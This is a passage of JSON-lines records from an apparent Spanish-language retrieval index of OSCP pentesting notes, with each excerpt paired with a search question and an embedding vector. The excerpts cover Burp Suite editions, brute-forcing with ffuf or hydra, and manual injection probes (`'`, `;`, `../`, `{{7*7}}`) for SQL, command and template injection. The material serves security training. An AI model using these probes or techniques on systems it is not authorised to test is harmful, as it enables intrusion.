-0.11786, 0.0615, -0.07478, 0.10814, 0.05841, -0.05906, 0.14622, -0.00122, -0.11367, -0.01337, -0.01281, 0.04289, -0.08114, -0.00103, -0.11776, -0.14801, -0.07259, 0.06853, 0.01916, -0.11959, 0.06747, 0.01908, 0.02579, 0.07913, 0.00135, -0.02809, -0.04158, 0.00148, 0.02815, 0.01949, -0.02136, 0.02699, -0.04058, -0.03995, -0.01632, -0.04321, 0.00042, 0.07491, -0.04557, -0.08251, -0.08692, -0.02702, 0.04752, -0.01697, 0.02379, -0.00841, -0.05131, 0.05129, 0.0641, -0.00892, -0.08164, 0.02827, 0.05783, -0.01218, 0.02189, 0.02322, -0.04141, -0.05166, -0.07943, -0.07876, -0.05835, -0.05312, 0.08582, -0.06669, -0.01803, 0.02803, -0.0684, 0.02392, -0.01762, -0.03572, -0.00504, -0.01221, -0.07227, 0.01598, -0.06379, -0.02963, 0.0322, 0.03238, -0.05722, -0.07644, 0.00457, -0.09644, 0.03536, 0.01989, 0.07702, 0.0662, -0.07446, -0.03527, 0.04545, -0.03633, -0.01496, -0.06054, -0.04959, 0.02797, -0.02968, 0.06125, -0.00522, 0.01789, -0.04266, 0.02618, -0.07283, -0.01615, 0.04107, 0.02679, 0.06712, -0.06778, -0.02159, -0.01432, 0.04931, -0.08384, -0.04917, -0.09543, -0.03246, -0.04389, -0.026, -0.10172, 0.04211, 0.05485, 0.01845, -0.03984, -0.03958, 0.03233, -0.00085, -0.0462, 0.08419, 0.02854, 0.03241, 0.03847, -0.06123, 0.05866, 0.04914, 0.0112, 0.03315, 0.03536, 0.05274, 0.07291, 0.07128, -0.02723, -0.02068, -0.09116, 0.0187, 0.01339, 0.08004, -0.064, -0.07753, 0.02292, -0.0549, -0.00371, 0.04714, -0.06975, 0.0071, 0.01522, 0.03843, 0.00497, -0.01355, 0.04466, -0.05707, -0.0404, -0.02542, 0.03167, -0.02224, -0.03594, 0.02576, 0.01303, 0.05429, -0.0045, -0.05789, -0.02266, -0.02279, 0.03957, 0.05208, 0.04125, 0.08325, 0.01896, 0.03649, -0.07737, -0.06272, 0.03751, 0.03735, 0.02477, -0.02871, 0.03435, -0.03499, 0.01677, 0.06069, -0.02341, 0.02278, 0.02883, -0.04205, -0.12625, 0.02063, 0.02899, -0.01986, -0.0318, 0.08304, 0.032, -0.02514, 0.04463, -0.06907]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas estΓ‘ prohibido β†’ Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "indexar": "Existe alguna alternativa gratuita a OSCP para practicar el examen?", "v": [-0.13939, 0.15909, -0.11132, -0.15335, -0.04219, -0.14741, -0.0244, 0.03348, -0.11936, -0.06508, -0.02716, -0.03196, -0.01247, 0.03752, 0.12539, -0.03802, 0.06136, 0.04226, 0.06817, -0.01584, -0.09527, -0.0765, -0.1146, 0.093, 0.07352, 0.04719, -0.18003, -0.04659, -0.0168, -0.05456, 0.00506, 0.13843, 0.04278, -0.05423, -0.06779, 0.07935, 0.02285, -0.10403, 0.14539, 0.06521, 0.05899, 0.05906, 0.01464, 0.12798, 0.02504, 0.0647, -0.00113, 0.14477, -0.11107, -0.04389, 0.00898, -0.0894, 0.00387, -0.08697, -0.02502, -0.05299, 0.06177, -0.09835, 0.00348, -0.11614, 0.0717, 0.05348, 0.01044, -0.06609, 0.08007, 0.02605, -0.01397, 0.05474, -0.15505, 0.05597, -0.02118, 0.09837, -0.04535, -0.03527, -0.18744, -0.11981, 0.00196, -0.04266, 0.13206, 0.00454, 0.03197, -0.07974, 0.088, 0.03634, -0.1651, -0.09927, -0.03344, -0.07099, 0.00544, -0.00249, 0.02634, 0.09667, 0.07902, 0.08342, 0.02573, -0.13392, 0.02978, -0.03331, -0.04888, -0.02649, 0.08756, 0.12057, -0.03827, -0.03933, -0.08882, 0.00846, 0.01222, 0.02782, -0.05279, 0.02616, -0.0193, 0.03653, -0.06782, 0.0385, -0.04185, -0.10573, 0.02467, 0.03576, 0.00138, 0.02608, -0.0278, 0.04532, -0.07155, -0.01826, 0.01109, 0.06972, 0.0909, 0.07567, -0.01558, 0.11545, 0.06524, -0.05332, -0.07293, -0.03002, -0.13358, -0.08049, 0.00966, -0.04498, 0.01467, -0.02809, 0.01759, 0.01492, -0.02349, -0.06425, -0.02752, -0.01478, 0.01196, -0.04102, 0.01264, -0.06016, -0.10026, -0.05677, 0.00095, 0.10445, -0.00806, 0.01323, 0.02786, -0.01624, -0.00512, 0.06936, 0.01473, -0.05977, 0.00721, -0.00373, -0.03567, 0.02879, -0.02506, -0.0243, -0.08326, 0.06613, 0.01727, 0.04593, 0.02165, -0.00427, 0.07219, -0.01641, 0.06239, -0.03859, 0.02278, -0.03429, -0.01837, 0.02801, -0.04922, -0.00286, 0.03793, -0.01065, 0.03165, 0.04295, 0.03694, 0.00311, 0.03824, -0.03937, -0.07695, -0.05482, -0.00196, -0.0285, 0.06542, -0.1095, -0.04962, 0.02154, -0.10314, -0.05296, -0.02563, -0.06093, 0.02747, -0.02009, 0.04773, 0.07926, -0.00471, 0.01191, -0.03914, 0.00471, 0.04803, -0.04966, 0.03309, 0.0186, 0.02942, 0.06605, 0.0096, -0.00937, 0.00521, 0.0028, 0.04149, 0.05474, 2e-05, 0.0637, 0.00524, 0.04307, 0.02431, 0.05068, 0.06387, 0.04052, 0.0721, 0.0134, 0.06161, 0.02555, 0.03132, 0.03213, 0.01522, -0.00617, 0.01817, 0.00735, 0.00811, -0.00215, -0.03799, -0.00359, 0.00664, -0.06596, -0.00397, -0.0335, 0.01646, 0.01584, 0.02944, 0.01211, 0.00452, 0.0339]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas estΓ‘ prohibido β†’ Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "indexar": "Con quΓ© herramienta puedo hacer fuerza bruta intensa si no tengo acceso al scanner activo de OSCP?", "v": [-0.06834, -0.01916, -0.26001, -0.16566, -0.07564, -0.13567, -0.0623, -0.047, -0.14503, -0.03537, -0.04847, 0.00051, -0.04194, 0.04634, 0.05829, 0.0575, 0.01394, -0.09372, -0.05191, 0.01392, -0.06263, -0.06387, -0.0692, -0.0891, 0.0357, -0.01672, -0.1119, 0.05972, -0.09265, -0.05134, 0.00174, 0.09031, 0.16826, 0.04014, -0.02922, -0.06711, -0.10556, -0.01975, 0.15113, 0.13765, -0.06839, 0.11409, -0.07455, 0.00381, 0.10042, 0.05548, -0.01328, 0.08988, -0.05255, 0.08384, -0.17529, -0.18384, -0.11253, -0.12154, -0.12608, -0.13244, 0.12034, -0.02608, 0.01804, -0.10361, 0.02088, 0.08006, -0.11262, -0.10787, -0.03182, -0.05905, 0.00397, -0.03916, -0.08645, 0.03971, -0.13888, 0.01841, -0.03641, 0.00795, 0.00771, -0.08053, 0.01643, -0.04615, 0.07172, 0.03928, -0.04887, 0.00665, -0.07287, 0.01524, -0.10446, -0.14192, 0.06004, -0.0647, 0.00822, -0.09578, 0.02557, 0.0251, 0.02022, 0.04305, 0.00653, 0.03363, -0.01359, 0.05732, -0.01734, 0.00139, 0.0733, 0.01211, -0.07685, 0.01287, 0.06794, -0.07978, -0.07099, 0.0302, -0.03132, 0.02658, 0.0121, 0.00941, -0.04882, -0.00645, -0.0351, 0.04984, -0.0514, -0.11636, -0.0456, -0.00748, -0.01858, 0.08454, -0.02982, 0.03342, 0.03328, 0.04862, 0.02026, 0.07125, 0.00086, -0.09939, -0.00493, -0.01353, -0.0115, -0.06319, -0.02734, -0.0699, -0.0637, -0.1391, 0.03661, -0.06409, -0.04005, 0.0115, -0.00507, -0.04936, 0.0552, 0.00309, -0.02497, 0.00038, -0.04446, -0.03682, 0.06093, -0.07753, 0.03903, 0.07674, -0.02125, 0.00815, 0.04774, -0.01374, -0.06999, 0.03583, -0.05198, -0.03988, -0.08116, 0.00087, -0.03838, 0.05629, -0.07031, -0.03319, 0.00165, 0.00901, -0.06053, -0.02368, 0.08226, -0.02358, 0.02184, -0.09589, -0.01548, 0.04677, 0.00304, -0.0794, -0.01627, 0.04569, 0.06336, -0.04314, 0.04036, 0.01887, 0.01905, -0.02559, 0.03426, -0.0053, 0.02463, 0.03926, -0.01753, -0.02105, 0.07279, -0.03572, -0.02353, -0.02832, 0.04122, -0.00882, -0.00206, -0.06412, 0.00126, -0.05436, 0.0467, 0.03943, -0.01223, 0.04891, -0.0177, -0.00774, -0.02018, 0.00667, 0.08156, -0.03594, 0.00145, 0.00643, -0.01177, 0.07112, 0.02891, -0.03319, 0.01809, 0.02076, -0.01086, 0.05325, 0.05604, -0.021, 0.03836, -0.01961, 0.05483, 0.02659, 0.04807, -0.02352, -0.02008, -0.02125, 0.00885, 0.04104, 0.00052, 0.03458, -0.06707, 0.02502, 0.00509, 0.0064, 0.02623, -0.01093, -0.08964, 0.01781, 0.01436, -0.04875, -0.07433, -0.03363, 0.00812, 0.00229, 0.10138, -0.05295, 0.02937, 0.00378]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas estΓ‘ prohibido β†’ Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "indexar": "Puedo usar Content discovery en lugar del intruder de OSCP para mi prΓ‘ctica?", "v": [0.00081, -0.07237, -0.18361, -0.19101, 0.03848, -0.09446, -0.05896, 0.01387, -0.00818, -0.02994, -0.06302, -0.02162, -0.16686, -0.04143, -0.15199, -0.16337, 0.08581, -0.01578, -0.02286, -0.04215, -0.13608, -0.00579, -0.10864, 0.1046, 0.09343, 0.07978, -0.04406, -0.03867, -0.00416, -0.08298, -0.00274, 0.13213, -0.02359, 0.05463, -0.18384, -0.15149, -0.06559, -0.12955, -0.01109, 0.1289, -0.02436, 0.06063, -0.04411, 0.12313, 0.09181, -0.03493, 0.03641, -0.03147, -0.066, 0.09502, -0.04956, -0.04246, -0.12272, -0.07817, 0.01017, -0.02681, -0.0113, 0.00092, 0.05507, -0.06487, -0.13119, 0.05321, -0.11036, 0.00724, -0.01219, -0.10721, 0.00622, 0.17005, -0.0295, 0.11694, -0.01725, -0.00719, 0.00565, -0.00095, 0.01212, -0.05316, 0.02985, -0.01669, 0.13095, 0.00304, -0.02015, -0.0856, -0.00189, 0.00349, -0.11416, -0.07041, 0.09666, -0.08674, -0.05703, -0.04862, 0.0521, 0.07047, 0.01853, 0.03847, -0.06197, -0.14538, -0.00341, 0.00012, -0.04647, 0.04288, -0.00144, 0.0549, -0.05875, 0.06938, -0.06233, -0.01426, 0.01984, 0.05401, 0.01792, -0.11573, 0.07268, -0.05113, -0.07999, -0.01083, -0.09492, 0.04019, 0.05051, -0.0192, 0.03683, -0.1442, -0.09179, 0.02033, -0.02897, 9e-05, 0.01669, -0.02655, 0.02736, -0.00365, -0.00114, -0.03031, 0.01988, -0.0806, -0.06261, -0.02279, -0.02984, -0.01486, -0.0427, -0.08334, -0.10705, 0.08963, 0.05517, -0.07076, -0.0466, 0.01074, 0.01824, 0.03829, 0.03123, 0.05798, -0.0573, 0.05698, -0.13206, -0.05089, -0.10362, 0.02776, 0.03255, 0.02412, 0.04295, -0.05321, -0.03178, 0.04263, -0.01039, 0.03582, -0.03707, -0.02408, -0.01034, -0.04767, 0.01551, -0.08378, -0.04873, 0.01197, -0.02457, 0.11286, 0.03937, -0.04214, 0.00265, -0.00799, 0.02125, -0.02811, -0.01423, -0.01374, -0.01612, -0.03886, 0.00289, 0.01983, 0.03349, -0.01845, 0.01156, 0.03968, -0.03538, 0.02464, 0.00616, -0.03935, 0.00799, 0.0231, -0.03708, -0.10337, 0.04135, -0.03813, -0.00103, -0.00694, -0.03364, 0.0368, -0.03013, -0.0377, 0.05311, -0.06204, -0.05696, 0.00787, -0.04061, -0.03834, 0.03491, -0.01195, 0.0647, 0.05442, -0.0257, 0.03036, -0.0405, 0.07909, -0.03224, -0.02389, 0.03546, 0.09424, 0.02333, -0.07699, -0.02603, 0.00085, 0.00882, -0.05215, 0.00678, 0.02971, -0.0356, 0.01291, -0.05125, -0.07944, 0.04301, -0.00954, -0.0406, 0.0229, -0.01648, -0.06372, -0.01791, 0.02018, 0.0493, 0.02087, -0.03114, -0.0098, -0.01981, 0.03301, -0.00805, -0.03464, 0.03857, -0.04147, 0.06138, -0.08246, 0.03116, 0.00999]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© lo usas en cada vector\n- Cambiar `Content-Type` y extensiΓ³n en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web Β· OSCP MOC", "indexar": "quΓ© herramienta puedo usar para probar inyecciones SQL y otras vulnerabilidades a mano", "v": [-0.12342, 0.0681, -0.15104, -0.12173, 0.02466, -0.14385, -0.07832, -0.14992, -0.04703, -0.07814, -0.15722, -0.08699, 0.00407, -0.04294, -0.12459, 0.06828, 0.05427, -0.17019, -0.05021, 0.02782, 0.06406, -0.0853, -0.10202, -0.06864, -0.08746, -0.01268, 0.08542, -0.01876, -0.064, -0.05777, -0.13345, 0.01051, 0.07504, -0.02593, -0.08721, -0.0355, -0.00439, 0.00514, 0.05012, 0.00149, 0.05601, -0.04237, -0.14398, 0.01733, 0.04004, 0.04907, -0.05381, -0.01129, -0.0814, 0.08257, -0.09716, -0.12449, -0.19323, -0.07016, 0.01558, -0.08256, 0.15108, -0.06283, 0.06058, -0.02408, -0.14024, -0.01496, 0.02806, 0.01085, -0.0101, -0.07129, -0.01947, -0.06938, -0.1634, 0.14301, -0.08812, 0.03212, -0.07115, -0.02187, 0.00901, -0.01159, 0.0442, 0.032, 0.03248, -0.0432, -0.10153, 0.02531, -0.04882, 0.06547, -0.07927, -0.09569, 0.16552, 0.01431, 0.07768, -0.07845, 0.08878, 0.01183, -0.01002, -0.03338, 0.02587, -0.04408, 0.09832, -0.03376, -0.01159, -0.03182, 0.08727, -0.07548, -0.04053, 0.15206, -0.00104, 0.05026, -0.00551, 0.00478, -0.05914, -0.09164, 0.02254, -0.01494, -0.09595, -0.01672, 0.00627, 0.08506, -0.02085, -0.02264, -0.03377, -0.04187, 0.00574, 0.00167, -0.04205, -0.01418, 0.02959, -0.01312, -0.00781, 0.0605, -0.05895, -0.05436, -0.01102, -0.02225, -0.05867, -0.00258, -0.01012, 0.03584, 0.02924, -0.12894, -0.0513, -0.03813, -0.00797, 0.00537, -0.01732, -0.05184, 0.02329, 0.02634, 0.01242, 0.00805, -0.09316, 0.02693, 0.07181, -0.08829, 0.00442, 0.03283, -0.05765, -0.00763, 0.02227, -0.00969, -0.07117, 0.04572, -0.04556, 0.00989, 0.02475, 0.0736, 0.02435, -0.05835, 0.04553, -0.05697, 0.08337, 0.04494, 0.05651, 0.06596, 0.06896, -0.02142, 0.04125, -0.07503, -0.06276, -0.0337, 0.01332, -0.11565, 0.02039, -0.00842, -0.04798, -0.02365, 0.06339, -0.01105, 0.01674, 0.03087, 0.05634, 0.04135, -0.02669, 0.05725, 0.02507, -0.04497, 0.07558, 0.00197, 0.01488, -0.08246, 0.01304, -0.04239, -0.06788, -0.03273, -0.07185, -0.08006, 0.06681, 0.0571, -0.05829, 0.03754, -0.01272, 0.0255, 0.03207, -0.01898, 0.09791, 0.0056, -0.02594, -0.0285, -0.01441, 0.03935, -0.00833, -0.01773, 0.00735, 0.03084, 0.06949, 0.00981, -0.00119, 0.00937, 0.00326, -0.03617, 0.03091, 0.05529, 0.06963, 0.0061, -0.05355, -0.02878, 0.02505, -0.02503, 0.04929, -0.03768, -0.0415, -0.05115, 0.04124, 0.08735, -0.00817, -0.01578, -0.02933, -0.03952, -0.04692, 0.0265, -0.06453, -0.07871, -0.0471, -0.00437, 0.04669, -0.05167, -0.00371, -0.04613]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© lo usas en cada vector\n- Cambiar `Content-Type` y extensiΓ³n en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web Β· OSCP MOC", "indexar": "con quΓ© programa manipulo cookies y headers en ataques de autenticaciΓ³n", "v": [0.01861, 0.00863, -0.03799, -0.1125, 0.02789, -0.11548, 0.04887, 0.14065, -0.09823, 0.02004, -0.04681, 0.07256, 0.00474, 0.02045, -0.0106, -0.07674, 0.16531, -0.03597, 0.18069, 0.03006, 0.04678, -0.04328, 0.01446, 0.06373, 0.00091, 0.00286, 0.02412, 0.10976, -0.0563, -0.09268, -0.00027, -0.03328, -0.02253, -0.03633, -0.04067, 0.0624, -0.03364, 0.03888, 0.11324, 0.15301, 0.02113, -0.09435, -0.10883, -0.03468, 0.0896, -0.02628, 0.00229, 0.02617, 0.12295, 0.02067, 0.11599, 0.00055, -0.13235, 0.03449, -0.01421, -0.05582, -0.01175, -0.15469, 0.06609, -0.00884, -0.11903, 0.07718, 0.07579, 0.02785, 0.08096, -0.03803, 0.00135, -0.12772, 0.05379, 0.06966, 0.0634, -0.02899, 0.08661, -0.01976, 0.10155, -0.01294, 0.02834, 0.08237, 0.02533, -0.03408, -0.06169, -0.02394, 0.0076, 0.08621, -0.07467, 0.03955, -0.04717, -0.07041, -0.06922, -0.11739, 0.07282, 0.11618, -0.0429, -0.01054, 0.03287, 0.00811, 0.04535, -0.11292, 0.07502, -0.00936, 0.0397, -0.03174, -0.1375, 0.17044, 0.03476, 0.0772, -0.00932, -0.06005, 0.00984, -0.00971, -0.12845, -0.01513, -0.05093, -0.0153, 0.07349, 0.07639, -0.02302, 0.06653, -0.00156, -0.17793, -0.13579, -0.02288, -0.06295, 0.07006, 0.00035, 0.00545, -0.03427, 0.0762, -0.07653, -0.04401, -0.06141, 0.08038, 0.00532, 0.10083, -0.07665, -0.02408, 0.04307, -0.08273, 0.04928, -0.03444, -0.01714, 0.13981, 0.13606, 0.00294, -0.00523, 0.02541, -0.0677, 0.01685, -0.02568, -0.03279, 0.0612, -0.00234, 0.01681, 0.07534, -0.0178, -0.02592, 0.02923, -0.02633, -0.03899, 0.09097, -0.07317, 0.01992, -0.05611, -0.00197, 0.05316, -0.02453, -0.02794, -0.01668, 0.09712, 0.08237, -0.08761, 0.08325, 0.10617, -0.01459, 0.03065, -0.02439, -0.04377, -0.08586, -0.04854, -0.05597, -0.03772, -0.0224, 0.10374, 0.02289, -0.01847, -0.02678, 0.01698, 0.04363, 0.02173, 0.0543, 0.02403, 0.00954, -0.0182, 0.00378, 0.06577, -0.01637, -0.04346, 0.0208, 0.07386, 0.06515, 0.06385, -0.03302, 0.01997, 0.05621, -0.00385, 0.15984, 0.01019, -0.09945, -0.01517, 0.07754, 0.00348, -0.01954, 0.05608, 0.0154, -0.06672, -0.01411, 0.03511, 0.00829, 0.00866, 0.03617, -0.01309, -0.02233, 0.01182, 0.04225, -0.05033, -0.06768, 0.00449, 0.00708, 0.02166, 0.02367, -0.01824, -0.0376, 0.00321, -0.00946, 0.0558, -0.02156, 0.06511, -0.00639, -0.01879, -0.04451, -0.00545, 0.01121, 0.00383, -0.07407, -0.01228, 0.018, -0.07617, -0.02266, 0.04612, -0.00184, -0.03526, -0.032, -0.02242, -0.02821, 0.04824, -0.01216]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© lo usas en cada vector\n- Cambiar `Content-Type` y extensiΓ³n en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web Β· OSCP MOC", "indexar": "cΓ³mo cambio el Content-Type o la extensiΓ³n en un ataque de subida de archivos", "v": [-0.01083, 0.07939, -0.01379, -0.1158, -0.01853, -0.0481, -0.07118, 0.03922, -0.01547, 0.04394, -0.10281, -0.23751, -0.0957, -0.04711, -0.03083, -0.16352, 0.08584, -0.01783, 0.08855, -0.07188, 0.05588, -0.03139, 0.0584, -0.13912, -0.02864, 0.03546, -0.05917, 0.17301, -0.02709, -0.01412, -0.01392, 0.01674, 0.02095, 0.14464, 0.01686, -0.01488, 0.04258, 0.03091, -0.00705, -0.06465, -0.01286, -0.02522, -0.11655, -0.08454, -0.00668, -0.09512, 0.02664, 0.09786, 0.11926, -0.02117, 0.03664, 0.0596, -0.07454, -0.10045, -0.05344, 0.032, 0.03646, -0.13138, -0.05162, -0.00934, 0.02346, 0.12538, -0.07871, -0.08036, -0.00047, -0.09306, -0.17904, 0.09444, -0.07383, 0.01251, -0.00173, -0.01724, -0.00518, 0.02156, -0.00097, -0.033, 0.06362, -0.03286, -0.12461, 0.04659, 0.00383, 0.00948, -0.08929, 0.04214, -0.09865, 0.0127, 0.02064, -0.10429, -0.11233, 0.00115, 0.15338, -0.12556, 0.07747, -0.03456, -0.11579, -0.10703, -0.00038, -0.19524, 0.00901, -0.02356, 0.00137, 0.03886, -0.00311, 0.10119, 0.06693, 0.11846, -0.03457, -0.01366, -0.03521, -0.1076, 0.0833, 0.00662, 0.05162, 0.0134, -0.05079, -0.02957, -0.00734, 0.00672, 0.00251, -0.0599, -0.07951, -0.02502, -0.01173, 0.07727, -0.08455, -0.08074, -0.06246, 0.01247, -0.04138, -0.00185, -0.00671, 0.03395, 0.10073, -0.04814, -0.07002, 0.02547, 0.05151, 0.00743, -0.05329, -0.03885, 0.00905, 0.03915, -0.00755, 0.08187, 0.00412, -0.06898, 0.00021, -0.01314, -0.15539, -0.00133, -0.08602, -0.08002, -0.00359, 0.03925, -0.03854, -0.03753, -0.07654, -0.11366, -0.04632, 0.14174, -0.02375, -0.01172, -0.0514, 0.00102, 0.02618, -0.04659, 0.02967, -0.00886, -0.00957, -0.07568, -0.00819, -0.03337, 0.00611, -0.10174, 0.03856, -0.01408, -0.05783, -0.0156, 0.00842, 0.02233, -0.01563, -0.04067, 0.01287, 0.04947, -0.0502, -0.07338, 0.09359, -0.01312, -0.02063, 0.01682, -0.15571, -0.02491, -0.03838, -0.00251, -0.00974, -0.09608, -0.03742, 0.04923, -0.00103, 0.04062, -0.02166, -0.0894, -0.05029, -0.02775, 0.04565, -0.02465, -0.02637, -0.01309, -0.02271, 0.0374, -0.03798, -0.05044, 0.10409, -0.01119, 0.01933, 0.02282, -0.03642, 0.0529, 0.03121, -0.01137, 0.01276, 0.03915, -0.00019, -0.0119, -0.01631, -0.00885, -0.02576, -0.07892, -0.00851, 0.02638, 0.0026, 0.0246, 0.03781, -0.03679, 0.02173, -0.00618, -0.00855, 0.06729, -0.04454, 0.01175, -0.0378, 0.01497, 0.00525, 0.01012, -0.06868, -0.04201, -0.0479, 0.03595, -0.00811, 0.01832, -0.01188, -0.01567, -0.0496, 0.01168, 0.02458, -0.00184]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Command injection\n\n> Un parΓ‘metro web acaba dentro de un comando del sistema β†’ ejecutas comandos. RCE directo, vector top del Hacking web.", "indexar": "que tΓ©cnica de hacking consiste en ejecutar comandos a travΓ©s de un parΓ‘metro web?", "v": [0.18079, 0.01285, -0.11131, -0.16809, 0.04489, -0.11688, 0.07276, -0.00163, 0.00162, 0.03229, -0.11961, 0.06662, 0.02787, -0.00502, 0.05448, 0.07266, 0.19859, -0.0542, 0.05214, -0.03129, 0.02611, -0.00134, -0.06799, -0.03448, -0.04808, -0.09025, 0.00881, 0.00081, -0.22382, -0.12734, -0.0209, 0.02872, -0.00672, -0.01041, -0.12355, 0.01758, -0.01651, 0.02174, 0.06667, 0.13321, -0.12307, 0.00368, -0.12494, -0.01845, 0.02435, -0.0166, 0.06371, -0.08154, 0.0767, -0.04937, 0.04782, 0.05458, -0.19031, -0.00925, -0.03902, -0.10919, 0.17041, -0.01951, -0.04408, -0.12593, 0.00134, -0.06012, 0.06429, 0.0596, 0.0329, -0.04026, -0.04288, -0.12177, -0.07994, 0.0957, 0.04651, 0.07562, -0.07084, 0.02437, 0.05545, -0.03076, -0.02568, 0.02105, 0.11449, -0.02006, -0.06065, 0.00454, -0.04582, -0.03432, -0.13085, -0.06234, 0.00981, -0.09705, 0.01238, -0.07175, 0.09541, 0.06901, 0.02077, -0.02889, 0.01762, -0.00189, 0.09354, -0.0142, 0.00048, 0.00295, 0.0344, -0.08583, -0.13355, 0.10478, 0.02111, 0.08053, 0.02856, -0.02121, 0.01479, -0.08798, -0.02751, 0.01177, -0.0882, -0.06993, -0.05617, -0.08813, 0.01862, -0.04771, 0.00866, -0.0464, -0.15583, 0.0552, 0.00837, 0.08264, 0.03971, -0.04466, -0.05918, 0.03022, 0.0108, -0.00767, 0.01217, -0.03619, -0.01829, -0.00498, -0.04989, 0.12677, 0.01029, -0.10004, -0.06891, -0.06727, 0.00618, 0.08351, -0.08826, 0.05695, 0.05807, -0.00561, 0.09279, -0.06283, -0.1342, -0.0651, 0.05396, 0.0484, -0.08884, 0.03148, -0.11282, -0.03717, -0.06925, -0.09367, -0.04146, 0.09189, 0.01417, -0.00741, -0.02528, -0.06044, -0.06577, -0.01259, -0.02317, -0.01351, 0.00279, 0.0183, -0.02843, 0.10634, -0.02122, -0.04593, 0.04035, 0.01018, -0.05635, -0.02203, -0.00567, -0.0357, -0.03554, -0.0094, 0.04772, 0.0131, -0.05042, -0.02618, -0.01663, 0.02874, -0.03397, 0.06033, -0.02697, -0.02777, -0.07127, 0.04743, 0.0168, -0.01366, -0.04285, 0.00785, 0.01779, -0.05515, -0.04082, 0.00026, 0.03862, -0.05867, -0.01344, 0.02778, 0.00431, -0.06647, -0.07562, 0.0338, 0.07268, -0.02923, 0.00641, -0.00705, -0.01779, -0.01557, 0.03501, 0.01708, -0.06618, -0.00739, 0.03303, -0.02284, 0.04436, -0.00012, 0.00308, 0.0071, 0.00993, 0.01745, 0.02135, -0.0038, -0.00262, -0.00574, -0.02274, -0.01739, 0.02235, -0.03194, 0.00558, -0.00556, -0.06592, -0.05308, -0.03713, 0.02973, -0.01424, -0.09704, -0.03106, -0.06334, -0.08776, -0.00332, -0.02162, -0.05087, -0.02951, 0.02274, -0.00856, -0.02196, -0.01002, -0.03143]} -{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Command injection\n\n> Un parΓ‘metro web acaba dentro de un comando del sistema β†’ ejecutas comandos. RCE directo, vector top del Hacking web.", "indexar": "como puedo realizar una inyecciΓ³n de comandos para obtener acceso remoto completo?", "v": [0.21084, 0.12179, -0.15797, -0.08108, 0.10896, -0.02291, 0.07804, 0.02319, -0.15537, -0.00845, -0.12899, -0.05608, 0.09291, -0.04935, 0.05257, 0.11855, 0.15803, 0.07571, -0.12471, 0.02921, 0.12388, -0.10645, -0.00112, -0.01693, 0.00758, 0.08097, 0.10581, 0.05569, -0.06947, -0.13093, 0.03732, -0.03003, 0.01967, 0.01661, -0.00021, -0.0689, -0.04276, 0.12898, -0.04389, 0.09412, -0.024, -0.00627, -0.20666, 0.00578, 0.04217, -0.04694, 0.13087, 0.02628, 0.06163, -0.10194, 0.01524, -0.02766, -0.08665, -0.08955, -0.10604, -0.0197, 0.20194, -0.08834, -0.02538, -0.00338, -0.01926, -0.07427, 0.05534, 0.0912, -0.03102, -0.07923, -0.06868, -0.06261, -0.03014, 0.05855, -0.13325, -5e-05, -0.0609, 0.02274, 0.02781, -0.03456, -0.11509, -0.01973, 0.10292, -0.05234, -0.06913, 0.02111, -0.08463, 0.00537, -0.07239, -0.10246, 0.03216, -0.06875, 0.00814, -0.10713, 0.10354, -0.0555, 0.01107, -0.01584, -0.00574, 0.0867, -0.08009, -0.02558, -0.05603, -0.04582, -0.02805, 0.01584, -0.04286, 0.12836, 0.01932, 0.02654, 0.03752, -0.07576, 0.00157, -0.02572, -0.04303, -0.03204, -0.04957, -0.08124, -0.07088, -0.04126, -0.06855, 0.00296, -5e-05, -0.04326, -0.16407, 0.03022, 0.00357, 0.06824, -0.00888, -0.04811, -0.07686, -0.02262, 0.0092, 0.01437, -0.01543, 0.06472, 0.04707, -0.09641, -0.00384, 0.08096, -0.02904, -0.03174, -0.09135, -0.10935, 0.01948, -0.00486, 0.04509, 0.01249, 0.02661, -0.00403, -0.02533, -0.07772, 